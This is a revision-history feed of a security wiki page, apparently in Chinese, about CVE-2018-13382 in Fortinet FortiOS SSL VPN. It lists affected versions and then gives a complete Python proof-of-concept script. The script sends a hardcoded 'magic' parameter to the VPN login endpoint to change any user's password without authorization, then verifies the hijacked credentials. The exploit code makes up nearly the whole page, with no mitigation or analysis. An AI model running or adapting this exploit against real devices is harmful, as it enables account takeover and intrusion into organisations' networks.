https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-13382_Fortigate_SSL_VPN_%E5%BE%8C%E9%96%80
CVE-2018-13382 Fortigate SSL VPN 後門 - Revision history
2026-04-07T22:00:42Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-13382_Fortigate_SSL_VPN_%E5%BE%8C%E9%96%80&diff=1882&oldid=prev
Pwnwiki: 建立內容為「==後門影響== Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11 ==POC== <pre> import requests, binascii, optparse, sy…」的新頁面
2021-04-23T01:02:55Z
<p>建立內容為「==後門影響== Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11 ==POC== <pre> import requests, binascii, optparse, sy…」的新頁面</p>
<p><b>New page</b></p><div>==後門影響==<br />
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11<br />
<br />
==POC==<br />
<pre><br />
import requests, binascii, optparse, sys<br />
from urlparse import urlparse<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
requests.packages.urllib3.disable_warnings()<br />
import multiprocessing<br />
import colored<br />
from user_agent import generate_user_agent, generate_navigator<br />
bold=True<br />
userAgent=generate_user_agent()<br />
username=""<br />
newpassword=""<br />
ip=""<br />
def setColor(message, bold=False, color=None, onColor=None):<br />
from termcolor import colored, cprint<br />
retVal = colored(message, color=color, on_color=onColor, attrs=("bold",))<br />
return retVal<br />
def checkIP(ip):<br />
try:<br />
url = "https://"+ip+"/remote/login?lang=en"<br />
headers = {"User-Agent": userAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}<br />
r=requests.get(url, headers=headers, verify=False)<br />
if r.status_code==200 and "<title>Please Login</title>" in r.text:<br />
return True<br />
else:<br />
return False<br />
except requests.exceptions.ConnectionError as e:<br />
print e<br />
return False<br />
def changePassword(ip,username,newpassword):<br />
url = "https://"+ip+"/remote/logincheck"<br />
headers = {"User-Agent": userAgent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://"+ip+"/remote/login?lang=en", "Pragma": "no-cache", "Cache-Control": "no-store, no-cache, must-revalidate", "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Connection": "close"}<br />
data = {"ajax": "1", "username": username, "realm": '', "credential": newpassword, "magic": "4tinet2095866", "reqid": "0", "credential2": newpassword}<br />
r=requests.post(url, headers=headers, data=data, verify=False)<br />
if r.status_code==200 and 'redir=/remote/hostcheck_install' in r.text:<br />
return True<br />
else:<br />
return False<br />
def testLogin(ip,username,newpassword):<br />
url = "https://"+ip+"/remote/logincheck"<br />
headers = {"User-Agent": userAgent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://"+ip+"/remote/login?lang=en", "Pragma": "no-cache", "Cache-Control": "no-store, no-cache, must-revalidate", "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Connection": "close"}<br />
data = {"ajax": "1", "username": username, "realm": '', "credential": newpassword}<br />
r=requests.post(url, headers=headers, data=data, verify=False)<br />
if r.status_code==200 and"redir=/remote/hostcheck_install" in r.text:<br />
return True<br />
else:<br />
return False<br />
parser = optparse.OptionParser()<br />
parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")<br />
parser.add_option('-u', action="store", dest="username")<br />
parser.add_option('-p', action="store", dest="password")<br />
options, remainder = parser.parse_args()<br />
if not options.username or not options.password or not options.ip:<br />
print "[!] Please provide the ip (-i), username (-u) and password (-p)"<br />
sys.exit()<br />
if options.username:<br />
username=options.username<br />
if options.password:<br />
newpassword=options.password<br />
if options.ip:<br />
ip=options.ip<br />
tmpStatus=checkIP(ip)<br />
if tmpStatus==True:<br />
print "[*] Checking if target is a Fortigate device "+setColor(" [OK]", bold, color="green")<br />
if changePassword(ip,username,newpassword)==True:<br />
print "[*] Using the magic keyword to change password for: ["+username+"]"+setColor(" [OK]", bold, color="green") <br />
if testLogin(ip,username,newpassword)==True:<br />
print "[*] Testing new credentials ["+username+"|"+newpassword+"] "+setColor(" [OK]", bold, color="green")<br />
print "************** Enjoy your new credentials **************"<br />
else:<br />
print "[*] Testing new credentials ["+username+"|"+newpassword+"] "+setColor(" [NOK]", bold, color="red")<br />
else:<br />
print "[*] Using the magic keyword to change password for: ["+username+"]"+setColor(" [NOK]", bold, color="red") <br />
else:<br />
print "[*] Checking if target is a Fortigate device "+setColor(" [NOK]", bold, color="red")<br />
</pre></div>
Pwnwiki